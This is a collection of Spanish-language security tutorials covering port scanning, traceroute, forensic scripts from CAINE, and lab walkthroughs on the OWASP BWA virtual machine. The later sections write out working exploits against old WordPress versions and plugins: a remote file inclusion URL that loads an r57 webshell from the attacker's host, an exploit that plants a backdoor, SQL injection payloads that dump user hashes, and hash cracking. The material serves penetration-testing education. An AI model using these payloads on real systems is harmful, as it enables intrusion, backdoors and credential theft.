Escanear Puertos TCP y UDP utilizando ScanLine

Body

ScanLine es un escaner de puertos en línea de comando para plataformas Windows. Puede realizar el “ping” ICMP tradicional, escaneo ICMP TimeStamp, puede mostrar los tiempos de respuesta y número de saltos, hacer escaneos TCP, escaneos simple UDP, captura de banner y resolución del hombre del host. El escaneo se realiza con un diseño en paralelo altamente rápido, sin recurrir a la utilización de diversos hilos. Puede gestionar grandes números y rangos de direcciones IP sin ningún problema.

Para la siguiente demostración se utilizará como objetivo de evaluación un sistema Windows.

Para obtener la ayuda de la herramienta escribir su nombre o utilizar la opción “-h”.

Se procede a realizar un escaneo de puertos TCP y UDP al unísono. La opción “-t” define los puertos TCP a escanear, y la opción “-u” define los puertos UDP a escanear. Para esta demostración se escanean los 65535 puertos TCP y UDP incluyendo el puerto 0.

C:\> sl.exe -t 0-65535 -u 0-65535 192.168.0.X

Los resultados presentan los puertos en estado abierto o en atención detectados por “ScanLine”.

Para realizar una captura de banners desde los puertos se utiliza la opción “-b”. Para la siguiente demostración únicamente se escanean los puertos abiertos TCP y UDP descubiertos en el procedimiento anterior.

C:\> sl.exe -n -b -t 21,25,80,135,139,443,445,1025,3389 -u 123,137,138,161,445,500,1434,1900,3456 192.168.0.X

La herramienta ha capturado únicamente información de los banners para los puertos TCP/25 y TCP/80.

Para realizar un escaneo el cual permita detectar únicamente hosts en funcionamiento; aquellos respondiendo a ICMP; se debe utilizar la opción “-n”, la cual especifica no realizar un escaneo de puertos. Cuando ScanLine busca por host en funcionamiento normalmente utiliza un paquete ICMP Echo Request estándar. El proporcionar la opción “-i” genera la utilización de técnicas adicionales para el descubrimiento del host, como Peticiones “ICMP Timestamp” en lugar de “Echo Request”, pues algunos sistema podrían bloquear Peticiones Echo pero podrían responder a Peticiones Timestamp.

C:\> sl.exe -n -i [Rango de Direcciones IP]

Se sugiere ejecutar la herramienta ScanLine como Administrador.

Fuentes:

http://www.mcafee.com/us/downloads/free-tools/scanline.aspx

Realizar un Trazado de Ruta y Consulta Whois utilizando Trout

Body

Trout es un programa visual para las conocidas aplicaciones en línea de comando “ traceroute” y “whois”. El programa permite controlar los velocidad y frecuencia de los “ping” utilizados para escanear un host seleccionado. La consulta Whois sencilla puede ser utilizada para identificar los hosts descubiertos a través de la ruta hacia la computadora destino. Técnicas de “Ping” en paralelo y consultas de nombres de host hacen a este programa tal vez el más rápido actualmente disponible.

Se procede a realizar una traza de la ruta hacia un host en Internet. Se define el nombre del host en el recuadro superior y se procede a hacer clic en el botón de nombre “Start Trace”.

Los resultados obtenidos presentan información del Salto, la Dirección IP, Nombre del Host, Paquetes enviados y recibidos, Tiempo de Ida y de Retorno promedio, máximo, mínimo y Porcentaje de perdida.

Es factible hacer una consulta al dominio de un salto en particular haciendo clic derecho sobre este y seleccionado la opción “Whois”.

Los resultados de la consulta serán presentados en la nueva ventana presentada.

Esta consulta Whois también puede ser realizada de manera independiente utilizando la opción “Trace -> Whois” del menú superior. En esta ventana se define el dominio a consultar en el campo de nombre “Query”, y opcionalmente también se puede definir el servidor Whois al cual se realizará la consulta, en el recuadro de nombre “Server”.

En caso se requieran realizar algunos ajustes en la herramienta, utilizar la opción “Options -> Setup” del menú superior.

Fuentes:

http://www.mcafee.com/us/downloads/free-tools/trout.aspx

Obtener Metadatos desde Archivos en Formato OpenXML utilizando read_open_xml

Body

Este script incluido en la más reciente versión de CAINE, lee un documento escrito en formato OpenXML como documentos de Microsoft Office, y muestra la información de metadatos contenidas en este de acuerdo a la documentación proporcionada por Microsoft.

De acuerdo al estándar los documentos OpenXML se comprimen utilizando ZIP y por lo tanto se requiere esta herramienta para descomprimir los documentos conteniendo la información de metadatos antes de procesarlos.

Los metadatos son luego almacenados en documentos XML. El archivo de nombre "_rels/.rels" define las relaciones contenidas en el documento y por lo tanto debe ser el primer archivo leído. Desde aquí se puede encontrar cualquier archivo adicional conteniendo información de metadatos. Muchos archivos podrían contener dos archivos con información de metadatos.

DOC.ENDING/docProps/app.xml
DOC.ENDING/docProps/core.xml

Este script leerá el archivo de nombre "_rels/.rels", interpretar su salida, buscar por cualquier archivo XML conteniendo información de propiedad del archivo, y luego interpretará el documento para obtener la información sobre metadatos encontrados.

La manera de utilizar la herramienta es simple, únicamente se debe definir el nombre del archivo a analizar.

Se define el nombre del archivo a analizar.

La herramienta reconoce el archivo definido como un documento Word. Luego expone los Metadatos de Aplicación; plantilla, tiempo total, páginas, palabras, caracteres, aplicación seguridad del documento, líneas, párrafos, versión de la aplicación, entre otra información. Los Metadatos de Archivo exponen el creador, quien realizó la ultima modificación, revisión, última impresión, creación y modificación.

Se procede a analizar un segundo archivo.

Este script requiere cumplir ciertas dependencias para funcionar (Archive:Zip y LibXML). En caso se suscitase un error al ejecutarlo, proceder a instalar las dependencias manualmente.

Fuentes:

http://www.caine-live.net/page11/page11.html

Obtener los Nombres de los Archivos Recuperados por Foremost utilizando Raw2Fs

Body

Raw2Fs es un script incluido en la más reciente versión de CAINE, el cual posibilita obtener los nombres de archivo desde los nombres de los archivos tallados o recuperados utilizando la herramienta Foremost. También permite encontrar todas las palabras claves en un archivo de dispositivo o flujo de bits, además de obtener los nombres de archivos o espacio residual donde estuvieron.

Las herramientas de “Carving” o Tallado como Foremost guardan los archivos nombrándolos con el número de sector (de 512 bytes) de inicio donde se encuentran. Por lo tanto es útil una herramienta la cual permita rastrear su probable nombre en el sistema de archivos.

Para la siguiente demostración se requiere previamente realizar un procedimiento de “Carving” o Tallado, para recuperar algunos tipos de archivos utilizando la herramienta Foremost.

Los tipos de archivos recuperados han sido JPG y PDF, los cuales son almacenados en directorio nombrados con las extensiones indicadas.

Al ejecutar la herramienta Raw2Fs se presenta un menú principal. La opción 1 permite obtener los nombres de archivo desde el espacio tallado sobre un nuevo dispositivo. La opción 2 busca por palabras clave. Seleccionar la Opción 1.

Se solicita insertar el nombre de la imagen o dispositivo.

Luego se solicita insertar el directorio de salida para los resultados.

Ahora se solicita insertar el nombre del archivo tallado con Foremost. Únicamente ingresar el nombre del archivo sin su extensión.

Se muestra información sobre la disposición del archivo conteniendo la imagen forense bajo análisis. Para luego solicitar insertar el tamaño del sector (Sugiero ingresar el Tamaño del Cluster).

Ahora se solicita insertar el tipo del sistema de archivos.

La herramienta muestra información del Cluster, I-Nodo y el Nombre del Archivo buscado.

Para guardar el archivo bajo análisis utilizar la opción 1 del menú presentado.

El archivo se ha recuperado correctamente con su nombre original.

Fuentes:

http://scripts4cf.sourceforge.net/tools.html
http://foremost.sourceforge.net/
http://nannibassetti.com/dblog/articolo.asp?articolo=73
http://www.caine-live.net/

Montar un Sistema de Archivos Remoto utilizando Remote Filesystem Mounter

Body

Durante la realización de un análisis forense es frecuente interactuar con un gran número de imágenes forenses. Razón por la cual resulta beneficioso almacenar todos los archivos en un lugar centralizado, el cual será de fácil acceso utilizando por ejemplo un recurso compartido. Adicionalmente este recurso compartido debe estar como mínimo asegurado con un usuario y contraseña.

Remote FileSystem Mounter es un script en bash incluido en la más reciente versión de CAINE, el cual puede realizar el montado automático de un recurso compartido mediante una Interfaz Gráfica de Usuario.

Para la siguiente demostración se utilizará un recurso compartido el cual contiene diversas imágenes forenses.

Hacer clic en “Menu -> Forensics Tools -> Remote Filesystem Mounter” para ejecutar la herramientas requerida.

Se presenta una nueva ventana en la cual se solicitan datos para realizar el procedimiento de Montaje. “RO o RW” define si el recurso compartido se montará en modo de Sólo Lectura (RO) o en modo de Lectura Escritura (RW). “Username” define el nombre de usuario. “Password” define la contraseña para el nombre de usuario utilizado. “IP address and directory” define la dirección IP y directorio del recurso compartido remoto a montar. Y “Mount point” define el directorio a utilizar como punto de montaje en el sistema de archivos local.

Rellenados los campos con la información requerida. Se procede a hacer clic en el botón de nombre “OK”.

Se presenta una nueva ventana indicando el montaje satisfactorio de la unidad de red en el directorio local pertinente.

Luego de hacer clic en el botón de nombre “OK”. Se apertura automáticamente el directorio local en el cual se ha montado el recurso compartido remoto.

El recurso compartido remoto ha sido montado de manera local exitosamente, siendo factible trabajar con las imágenes forenses en modo de solo lectura.

Fuentes:

http://www.caine-live.net/page11/page11.html
http://www.caine-live.net

Identificar y Explotar Cross Site Request Forgery (CSRF) utilizando ZAP

Body

Un ataque CSRF fuerza al usuario final a ejecutar acciones indeseables sobre una aplicación web en la cual está actualmente autenticado. Con un poco de ayuda de ingeniería social (como enviar un enlace mediante un correo electrónico o chat), un atacante puede forzar a los usuarios de una aplicación web a ejecutar acciones seleccionadas por el atacante. Una explotación satisfactoria de CSRF puede comprometer los datos y operaciones del usuario final, cuando tiene como objetivo un usuario normal. Si el usuario final objetivo es la cuenta de administrador, un ataque CSRF puede comprometer la aplicación web completa.

Para la siguiente demostración se utiliza la versión de la aplicación web de nombre “yazd” incluida en la máquina virtual OBWAP

Configurar Zed Attack Proxy en Firefox utilizando FoxyProxy, e ingresar en el formulario de registro de ingreso “Login” de la aplicación web, un usuario y contraseña válidos.

Ingresar a “User Account -> Manage your account”, para definir una nueva contraseña en los campos de nombre “Password” y “Confirm”.

En Zed Attack Proxy se analiza la petición realizada hacia la aplicación web. El método utilizado para enviar los datos es POST, y se expone en detalle todos los campos enviados en el formulario, incluyendo la nueva contraseña.

Hacer clic derecho sobre la petición y seleccionar la opción “Generate anti CSRF test FORM” en la nueva ventana desplegada.

Esta opción abrirá una URL la cual proporcionará un formulario generado para evaluar problemas de CSRF. Este solo estará habilitado para peticiones POST, si el API está habilitado y si Java soporta el abrir URLs en un navegador de la plataforma.

Este será el formulario el cual realizará las acciones maliciosas en la aplicación web definidas por el atacante. Los campos del formulario se pueden ocultar e incluir contenido “confiable”, como imágenes y texto de interés para la victima. Este formulario se almacenará en un servidor controlado por el atacante, y para maximizar la probabilidad de éxito se puede comprar un dominio similar a uno conocido y confiable.

Se define una nueva contraseña en los campos de nombre “Password” y “Confirm” del formulario, para luego hacer clic en el botón de nombre “Submit”.

Si la explotación es satisfactoria, la nueva contraseña habrá sido actualizada.

Para verificar esto se visualizan los datos enviados en el formulario utilizando Zed Attack Proxy.

Un CSRF es un ataque el cual engaña a la victima para enviar una petición maliciosa. Este hereda la identidad y privilegios de la victima para realizar funciones indeseables en nombre de la victima. Para la mayoría de sitios, las peticiones de los navegadores automáticamente incluyen cualquier credencial asociada con el sitio, como la cookie de sesión del usuario, dirección IP, credenciales de dominio de Windows, etc. Por lo tanto, si el usuario está actualmente autenticado hacia el sitio, el sitio no tendrá manera de distinguir entre la petición falsificada enviada por la victima y la petición legítima enviada por la victima.

Fuentes:

https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
https://www.owasp.org/index.php/Testing_for_CSRF_%28OTG-SESS-005%29
https://www.owasp.org/index.php/ZAP
https://github.com/zaproxy/zap-core-help/wiki/HelpUiTabsSites
http://sourceforge.net/p/owaspbwa/tickets/34/
http://resources.infosecinstitute.com/csrf-proof-of-concept-with-owasp-…
http://www.forumsoftware.ca/

Inclusión de Archivo Remoto (RFI) en Plugin myGallery de Wordpress

Body

WordPress es un software web el cual puede ser utilizado para crear sitios webs o blogs. Es al mismo tiempo libre y sin costo. WordPress y sus componentes asociados; como los plugins; tienen un extenso registro de vulnerabilidades de seguridad, los cuales son identificados y parcheados constantemente. Para la siguiente demostración se utiliza la versión de WordPress incluida en la Máquina Virtual OBWAP.

Existe una vulnerabilidad de inclusión de archivo PHP remoto (RFI) en el archivo myfunctions/mygallerybrowser.php en las versiones del Plugin myGallery iguales o inferiores a 1.4b4, el cual permite a los atacantes remotos ejecutar código PHP arbitrario mediante la definición de una URL en el parámetro de nombre “myPath”.

En Samurai WTF se inicia el servidor web Apache.

El archivo a incluir será un conocido webshell de nombre “r57.txt”. Este archivo debe residir en el directorio web de Samurai WTF. Un webshell permite tener control del sitio web, el cual permite realizar diversas acciones posteriores a una explotación satisfactoria.

Según el reporte de la vulnerabilidad, la explotación se debe realizar utilizando una URL con el siguiente formato.

[Path_myGallery]/mygallery/myfunctions/mygallerybrowser.php?myPath=Shell

En base a esto se construye la URL para explotar la vulnerabilidad. La primera dirección IP corresponde al objetivo de evaluación. La segunda dirección IP corresponde a Samurai WTF, es decir la máquina del atacante.

http: //192.168.0.33/wordpress/mygallery/myfunctions/mygallerybrowser.php?myPath=http: //192.168.0.18/r57.txt?

Notar el símbolo final de interrogante "?" después del nombre del archivo correspondiente a la webshell. Revisamos la parte del código vulnerable.

if (!$_POST){
$mypath=$_GET['myPath'];
}
else {
$mypath=$_POST['myPath'];
}
require_once($mypath.'/wp-config.php');

El en código no hay obstáculos antes de la variable de nombre “$mypath”, de esta manera el atacante puede ejecutar la webshell antes expuesta.

?myPath=http:// 192.168.0.18/r57.php?

Eventualmente el código cargado será ejecutado:

require_once($mypath.'http://192.168.0.18/r57.php?/wp-config.php');

El código después del símbolo final de interrogante "?" es interpretado como una cadena URL de consulta, pero también como una manera de truncar, el cual es un método común para vulnerabilidades de inclusión remota de archivo. De igual manera puede ser utilizado un "00%" como una manera de truncar la cadena a continuación del símbolo de interrogante.

Referencias:

https://www.exploit-db.com/exploits/3814/
https://www.owasp.org/index.php/Testing_for_Remote_File_Inclusion
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2426
http://osvdb.org/show/osvdb/34356
http://sourceforge.net/p/owaspbwa/tickets/9/
https://mycert.org.my/en/resources/web_security/main/main/detail/662/in…

Inyección de Shell Remota (Cache) en WordPress

Body

WordPress es un software web el cual puede ser utilizado para crear sitios webs o blogs. Es al mismo tiempo libre y sin costo. WordPress y sus componentes asociados; como los plugins; tienen un extenso registro de vulnerabilidades de seguridad, los cuales son identificados y parcheados constantemente. Para la siguiente demostración se utiliza la versión de WordPress incluida en la Máquina Virtual OBWAP.

Las versiones de WordPress iguales o inferiores a 2.0.2 contienen una falla la cual permite a los usuarios maliciosos comprometer el sistema vulnerable. Este problema es activado debido a la ausencia de una limpieza apropiada de diversos campos cuando se registra o actualizar el perfil de un usuario, antes de ser almacenado en scripts PHP en los directorios /wp-content/cache/userlogins/ y /wp-content/cache/users/ dentro del directorio raíz. Esto permite a un atacante inyectar y ejecutar código PHP arbitrario mediante un caracter de nueva línea generando una perdida de integridad.

Descargado el código de explotación, el cual esta escrito en PHP, se procede a ejecutarlo utilizando la opción “-q” el cual define un modo silencioso. La opción “-d” define una variable para cualquier directiva permitida en el archivo php.ini, para este caso la variable “short_open_tag” la cual evalúa si la forma corta de las etiquetas de apertura de PHP deben ser permitidas.

$ php -q -d short_open_tag=on 6.php

Expuesta la forma de uso, se ejecuta el exploit definiendo la dirección IP del objetivo de evaluación, el directorio donde reside WordPress, un usuario y contraseña válidos y el comando a ejecutar en caso la explotación sea exitosa.

$ php -q -d short_open_tag=on 6.php 192.168.0.33 /wordpress/ user user ls -la

Los resultados expuestos indican una explotación fallida. La razón de esto es porque contraseña de la bases de datos no es vacía. El cual es uno de los requisitos previos para un primer intento de explotación.

Si la constante de nombre DB_PASSWORD no está vacía, se debe intentar averiguar su valor realizando un ataque por diccionario. Para esto se utiliza la opción “-D” del exploit.

$ php -q -d short_open_tag=on 6.php 192.168.0.33 /wordpress/ user user ls -la -D/home/samurai/Wordlists/john.txt

Si el ataque por diccionario es exitoso, la explotación se realiza satisfactoriamente.

Ahora es factible ejecutar comandos mediante la URL indicada en el mensaje expuesto.

Adicionalmente se ha creado una “backdoor” o puerta trasera de nombre “suntzu.php” en la misma carpeta.

Adicionalmente el exploit permite definir el número de puerto utilizando la opción “-p”, y un proxy utilizando la opción “-P”.

Fuentes:

https://www.exploit-db.com/exploits/6/
http://sourceforge.net/p/owaspbwa/tickets/6/
http://sourceforge.net/projects/owaspbwa/
http://php.net/manual/en/features.commandline.options.php

Inyección SQL Remota (xmlrpc) en WordPress

Body

WordPress es un software web el cual puede ser utilizado para crear sitios webs o blogs. El cual es al mismo tiempo libre y sin costo. El núcleo del software está construido por cientos de voluntarios de la comunidad. WordPress y sus componentes asociados; como los plugins; tienen un extenso registro de vulnerabilidades de seguridad, los cuales son identificados y parcheados constantemente.

Para la siguientes demostración se utiliza la versión de WordPress incluida en la Máquina Virtual OBWAP. La identificación de vulnerabilidades se puede realizar utilizando una herramienta automática o realizando pruebas manuales.

Una vulnerabilidad de Inyección SQL en xmlrpc (xmlrpc.php) en Wordpress 2.1.2 y probablemente versiones anteriores, permite a los usuarios autenticados la ejecución de comandos arbitrarios SQL mediante un valor de parámetro cadena en una llamada al método XML RPC mt.setPosrCategories, relacionada a la variable de nombre “post_id”. El usuario debe pertenecer al rol de “contribuyente” o cualquier rol superior.

Descargado el código del exploit; el cual es un script en Perl; se procede a ejecutarlo.

Se definen las opciones pertinentes. El host, un nombre de usuario y contraseña válidas, y un “post_id” válido el cual pueda ser editado por el usuario. Se inicia la explotación.

$ perl 3656.pl http: //192.168.0.X/wordpress/ user user 5

El exploit finaliza su ejecución obteniendo los hash de las contraseñas pertenecientes a los diversos usuarios encontrados de WordPress.

Utilizando comandos shell en Linux, se filtran las contraseñas hacia un archivo de nombre “hashs”.

$ grep -i ^is: wphashs | cut -d " " -f 2 > /tmp/hashs

Obtenidos los hashs, es factible utilizar la herramienta de nombre HashCat para tratar de averiguar las contraseñas en texto plano. La opción “--remove” permite remover los hashs una vez “crackeados" u obtenidos. Adicionalmente se utiliza una lista de palabras de nombre “10kpasswords.txt”

$ sudo hashcat-cli32.bin --remove /tmp/hashs ~/Wordlists/10kpasswords.txt

Culminado el proceso, la herramienta muestra la obtención de dos contraseñas correspondientes a los usuarios “admin” y “user”.

Fuentes:

https://www.exploit-db.com/exploits/3656/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1897
http://osvdb.org/show/osvdb/34351
http://sourceforge.net/p/owaspbwa/tickets/7/
http://hashcat.net/wiki/doku.php?id=hashcat

Inyección SQL en el Plugin Wordpress Spreadsheet (wpSS) <= 0.6

Body

WordPress es un software web el cual puede ser utilizado para crear sitios webs o blogs. El cual es al mismo tiempo libre y sin costo. El núcleo del software está construido por cientos de voluntarios de la comunidad. Incluye miles de plugins y temas con los cuales se puede transformar un sitio en cualquier cosa imaginable.

WordPress y sus componentes asociados; como los plugins; tienen un extenso registro de vulnerabilidades de seguridad, los cuales son identificados y parcheados constantemente.

Para la siguientes demostración se utiliza la versión de WordPress incluida en la Máquina Virtual OBWAP. La identificación de vulnerabilidades puede ser realizar ya sea utilizando una herramienta automática como WPScan; de la cual se puede encontrar referencias en la parte final del presente escrito.

Otra opción es utilizar la herramienta Zed Attack Proxy para realizar un escaneo activo y descubrir vulnerabilidades en la Aplicación Web.

Se procede a verificar los hallazgos encontrados sobre Inyecciones SQL identificados en el plugin de nombre “WordPress SpreadSheet”.

Para verificar la vulnerabilidad detectada por la herramienta WPScan. Se utiliza la prueba de concepto expuesta en la página respectiva de “Exploit-DB”. Al realizar la Inyección SQL se expone la información del usuario de nombre “admin”, el hash de su contraseña, y su dirección de correo electrónico. El parámetro vulnerable es “ss_id” en la página de nombre “ss_load.php”.

http:// 192.168.0.33/wordpress/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain

Zed Attack Proxy reporta el hallazgo de tres inyecciones SQL, una utilizando el método GET y dos utilizando el método POST.

http:// 192.168.0.33/wordpress/wp-content/plugins/wpSS/ss_handler.php?display=0&edit&ss_id=1
http:// 192.168.0.33/wordpress/wp-content/plugins/wpSS/ss_handler.php?display&edit&ss_id
http:// 192.168.0.33/wordpress/wp-content/plugins/wpSS/ss_handler.php?display&edit&ss_id=1

Existe también un reporte en “SecurityFocus” relacionadas a estas Inyecciones SQL detectadas por ZAP. Puntualmente aquella utilizando el método GET. Se utiliza la prueba de concepto incluida en este reporte. El resultado de la Inyección SQL expone las ubicaciones en las cuales se muestran los datos extraídos desde la Base de Datos. El parámetro vulnerable es “ss_id” en la página de nombre “ss_handler.php"

http:// 192.168.0.33/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#

Los siguientes dos hallazgos de Inyecciones SQL detectados por ZAP utilizando el método POST pueden ser evaluados también utilizando el método GET con los mismos resultados.

Se puede automatizar la evaluación y el ataque de Inyección SQL utilizando la herramienta SQLMap.

$ sqlmap -u "http:// 192.168.0.33/wordpress/wp-content/plugins/wpSS/ss_handler.php?display=0&edit&ss_id=1" -b

En el mismo plugin también se han reportado vulnerabilidades de Cross-Site Scripting (XSS) Reflejado.

Fuentes:

http://www.reydes.com/d/?q=Realizar_un_Escaneo_de_Vulnerabilidades_cont…
https://www.exploit-db.com/exploits/5486/
https://wpvulndb.com/vulnerabilities/6482
http://www.securityfocus.com/bid/69089/exploit
http://www.wordpressexploit.com/
http://wpscan.org/
https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
http://sqlmap.org/